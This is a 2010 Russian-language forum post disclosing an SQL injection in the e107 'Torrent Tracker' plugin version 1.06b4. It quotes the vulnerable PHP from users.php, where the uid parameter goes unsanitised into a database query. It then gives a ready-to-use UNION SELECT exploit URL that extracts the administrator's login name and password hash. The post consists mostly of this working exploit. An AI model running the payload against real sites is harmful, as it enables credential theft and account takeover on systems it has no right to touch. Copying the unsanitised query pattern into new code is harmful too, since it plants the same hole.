Показать сообщение отдельно
Старый 05.07.2010, 12:26   #5
RulleR
 
Аватар для RulleR
 
Регистрация: 04.07.2010
Сообщений: 39
Репутация: 58
По умолчанию e107 Plugin [Torrent Tracker] SQL injection Vulnerability

Plugin name: Torrent Tracker (download)
Version: 1.06b4

SQL injection

Vuln file: /e107_plugins/tracker_menu/users.php
PHP код:
/*...*/
elseif($_GET["cntr"] == "info" || $_GET["cntr"] == "edit") {
if(
$_GET["uid"]) {
    
$uid $_GET["uid"];
    
$uname $e_users[0][$uid];
}
/*...*/
$numuser $sql -> db_Select("tracker_users""user_id,level,up,dl,passkey,actdate,lastdate,tentorr,lastipport""user_id = ".$uid);
/*...*/ 
Need: user account
Exploit:
Код:
http://[host]/[path]/e107_plugins/tracker_menu/users.php?cntr=info&uid=0+union+select+null,concat_ws(0x3a,user_loginname,user_password),null,null,null,null,null,null,null+from+e107_user+where+user_id=1--+
RulleR вне форума   Ответить с цитированием